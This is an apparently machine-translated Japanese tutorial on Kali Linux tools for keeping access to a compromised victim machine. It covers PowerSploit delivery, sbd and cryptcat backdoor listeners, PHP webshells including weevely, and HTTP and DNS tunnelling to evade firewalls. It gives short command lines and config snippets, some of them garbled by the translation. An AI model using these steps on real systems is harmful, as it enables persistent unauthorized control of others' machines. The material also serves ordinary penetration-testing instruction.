KaliLinux-アクセスの維持

この章では、Kaliが接続を維持し、ハッキングされたマシンが再び接続および切断された場合でもアクセスするために使用するツールについて説明します。

Powersploit

これは、Windowsマシン用のツールです。被害者のマシンにPowerShellがインストールされています。このツールは、ハッカーがPowerShellを介して被害者のマシンに接続するのに役立ちます。

それを開くには、左側のターミナルを開き、次のコマンドを入力してpowersploitフォルダーに入ります-

cd /usr/share/powersploit/

入力した場合 “ls”アクセス権を取得した後、被害者のマシンにダウンロードしてインストールできるすべてのpowersploitツールが一覧表示されます。それらのほとんどは、名前に応じて自明の名前です。

被害者のマシンにこのツールをダウンロードする簡単な方法は、Webサーバーを作成することです。これにより、powersploitツールは次のコマンドを使用して簡単に作成できます。

python -m SimpleHTTPServer

この後、次のように入力すると、http:// <Kali machine ip_address>:8000 /が表示されます。

Sbd

sbdはNetcatに似たツールです。ポータブルで、LinuxおよびMicrosoftマシンで使用できます。sbdの機能AES-CBC-128 + HMAC-SHA1暗号化>基本的に、特定のポートでいつでも被害者のマシンに接続し、リモートでコマンドを送信するのに役立ちます。

それを開くには、ターミナルに移動して入力します “sbd -l -p port” サーバーが接続を受け入れるため。

この場合、サーバーがリッスンするポート44を配置しましょう。

被害者のサイトで、「 “sbd IPofserver port”。リモートコマンドを送信できる接続が確立されます。

この場合、同じマシンでテストを実行したため、「localhost」になります。

最後に、サーバー上で、次のスクリーンショットに示すように接続が発生したことがわかります。

Webshel​​ls

Webshel​​lは、アクセスを維持したり、Webサイトをハッキングしたりするために使用できます。しかし、それらのほとんどはアンチウイルスによって検出されます。C99 phpシェルは、アンチウイルスの間で非常によく知られています。一般的なアンチウイルスは、マルウェアとして簡単に検出します。

一般的に、それらの主な機能は、Webインターフェイスを介してシステムコマンドを送信することです。

開くには、次のように入力します “cd /usr/share/webshells/” ターミナルで。

ご覧のとおり、これらはプログラミング言語に従ってクラスに分けられています:asp、aspx、cfm、jsp、perl、php

PHPフォルダーに入ると、phpWebページのすべてのWebシェルを表示できます。

たとえば、シェルをWebサーバーにアップロードするには “simple-backdoor.php” WebシェルのWebページとURLを開きます。

最後に、cmdコマンドを記述します。次のスクリーンショットのように、すべての情報が表示されます。

ウィーブリー

Weevelyは、telnetのような接続をシミュレートするPHPWebシェルです。これは、エクスプロイト後のWebアプリケーション用のツールであり、ステルスバックドアとして、または無料でホストされているアカウントであっても、正当なWebアカウントを管理するためのWebシェルとして使用できます。

それを開くには、ターミナルに移動し、その使用法を確認できる「weevely」と入力します。

シェルを生成するには、次のように入力します “weevely generate password pathoffile”。次のスクリーンショットに見られるように、それは「デスクトップ」フォルダに生成され、ファイルはアクセスを得るためにWebサーバーにアップロードされます。

次のスクリーンショットに示すようにWebシェルをアップロードした後、コマンドを使用してcmdでサーバーに接続できます。 “weevely URL password” ここで、セッションが開始されたことがわかります。

http-tunnel

http-tunnelは、HTTPリクエストでトンネリングされる双方向仮想データストリームを作成します。必要に応じて、HTTPプロキシを介してリクエストを送信できます。これは、制限のあるファイアウォールの背後にいるユーザーに役立ちます。HTTPプロキシを介したWWWアクセスが許可されている場合は、http-tunnelとtelnetまたはPPPを使用して、ファイアウォールの外側にあるコンピューターに接続することができます。

まず、次のコマンドでトンネルサーバーを作成する必要があります-

httptunnel_server –h

次に、クライアントサイトでタイプ “httptunnel_client –h” 両方が接続の受け入れを開始します。

dns2tcp

これも、TCPトラフィックをDNSトラフィック(UDP 53ポートを意味する)を介して渡すのに役立つトンネリングツールです。

開始するには、次のように入力します “dns2tcpd”。スクリプトを開くときに使用法が説明されています。

サーバーサイトで、このコマンドを入力してファイルを構成します。

#cat >>.dns2tcpdrc
<&l;END listen = 0.0.0.0 
port = 53 user=nobody 
chroot = /root/dns2tcp 
pid_file = /var/run/dns2tcp.pid 
domain = your domain key = secretkey 
resources = ssh:127.0.0.1:22 
END 
#dns2tcpd -f .dns2tcpdrc

クライアントサイトで、このコマンドを入力します。

# cat >>.dns2tcprc 
<<END domain = your domain 
resource = ssh 
local_port = 7891 
key = secretkey 
END
# dns2tcpc -f .dns2tcprc 
# ssh root@localhost -p 7891 -D 7076

トンネリングはこのコマンドで開始されます。

cryptcat

これは、暗号化された方法で被害者のマシンとTCPおよびUDP接続を確立できるNetcatのような別のツールです。

サーバーを起動して接続をリッスンするには、次のコマンドを入力します-

cryptcat –l –p port –n

どこ、

  • -l 接続を聞くことを表します

  • -p ポート番号パラメータを表します

  • -n 名前解決を行わないことを意味します

クライアントサイトでは、接続コマンドは “cryptcat IPofServer PortofServer”